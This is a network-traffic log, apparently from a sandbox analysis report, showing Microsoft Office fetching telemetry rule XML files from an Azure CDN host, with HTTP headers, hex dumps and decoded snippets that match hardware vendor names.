                                                x-azure-ref: 20241029T232251Z-r197bdfb6b48pl4k4a912hk2g400000006d000000000g0sg
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                37192.168.2.45808213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:51 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:51 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:51 GMT
                                                Content-Type: text/xml
                                                Content-Length: 419
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                ETag: "0x8DC582B9748630E"
                                                x-ms-request-id: 47f8d5d2-401e-005b-1e67-279c0c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232251Z-16849878b78q9m8bqvwuva4svc00000005r000000000fz3b
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                38192.168.2.45808513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:52 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:52 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:52 GMT
                                                Content-Type: text/xml
                                                Content-Length: 468
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                ETag: "0x8DC582B9C8E04C8"
                                                x-ms-request-id: 862c7620-501e-0029-4f4f-29d0b8000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232252Z-15b8d89586fdmfsg1u7xrpfws00000000bk0000000001swr
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                39192.168.2.45808413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:52 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:52 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:52 GMT
                                                Content-Type: text/xml
                                                Content-Length: 404
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                ETag: "0x8DC582B9E8EE0F3"
                                                x-ms-request-id: 9956b93e-101e-0017-0e1a-2447c7000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232252Z-17c5cb586f672xmrz843mf85fn00000005xg00000000qzyw
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:52 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                40192.168.2.45808613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:52 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:52 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:52 GMT
                                                Content-Type: text/xml
                                                Content-Length: 428
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                ETag: "0x8DC582BAC4F34CA"
                                                x-ms-request-id: 73bfd404-001e-0066-7fd4-26561e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232252Z-17c5cb586f672xmrz843mf85fn00000005xg00000000qzyy
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:52 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                41192.168.2.45808713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:52 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:52 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:52 GMT
                                                Content-Type: text/xml
                                                Content-Length: 499
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                ETag: "0x8DC582B98CEC9F6"
                                                x-ms-request-id: 54a08b66-801e-008f-529b-272c5d000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232252Z-16849878b786fl7gm2qg4r5y7000000007bg00000000zehz
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:52 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                42192.168.2.45808813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:52 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:52 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:52 GMT
                                                Content-Type: text/xml
                                                Content-Length: 415
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                ETag: "0x8DC582B988EBD12"
                                                x-ms-request-id: 546431bf-201e-0085-0b72-2734e3000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232252Z-16849878b78qfbkc5yywmsbg0c00000006x000000000ace4
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:52 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                43192.168.2.45809113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:53 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:53 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:53 GMT
                                                Content-Type: text/xml
                                                Content-Length: 494
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                ETag: "0x8DC582BB8972972"
                                                x-ms-request-id: 9969a17a-a01e-0021-051b-28814c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232253Z-r197bdfb6b4qbfppwgs4nqza8000000005rg00000000gynm
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:53 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                44192.168.2.45808913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:53 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:53 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:53 GMT
                                                Content-Type: text/xml
                                                Content-Length: 471
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                ETag: "0x8DC582BB5815C4C"
                                                x-ms-request-id: f6d28dea-a01e-0002-4ae8-285074000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232253Z-15b8d89586f6nn8zqg1h5suba800000002b000000000hrws
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:53 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                45192.168.2.45809013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:53 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:53 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:53 GMT
                                                Content-Type: text/xml
                                                Content-Length: 419
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                ETag: "0x8DC582BB32BB5CB"
                                                x-ms-request-id: df8e274c-401e-002a-26fc-28c62e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232253Z-r197bdfb6b4g24ztpxkw4umce800000008tg000000007uuw
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                46192.168.2.45809213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:53 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:53 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:53 GMT
                                                Content-Type: text/xml
                                                Content-Length: 420
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                ETag: "0x8DC582B9DAE3EC0"
                                                x-ms-request-id: 892d3b27-201e-005d-7649-27afb3000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232253Z-16849878b78bcpfn2qf7sm6hsn00000008sg00000000nmkq
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:53 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                47192.168.2.45809313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:53 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:53 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:53 GMT
                                                Content-Type: text/xml
                                                Content-Length: 472
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                ETag: "0x8DC582B9D43097E"
                                                x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232253Z-16849878b78wv88bk51myq5vxc00000007eg00000000m6pd
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
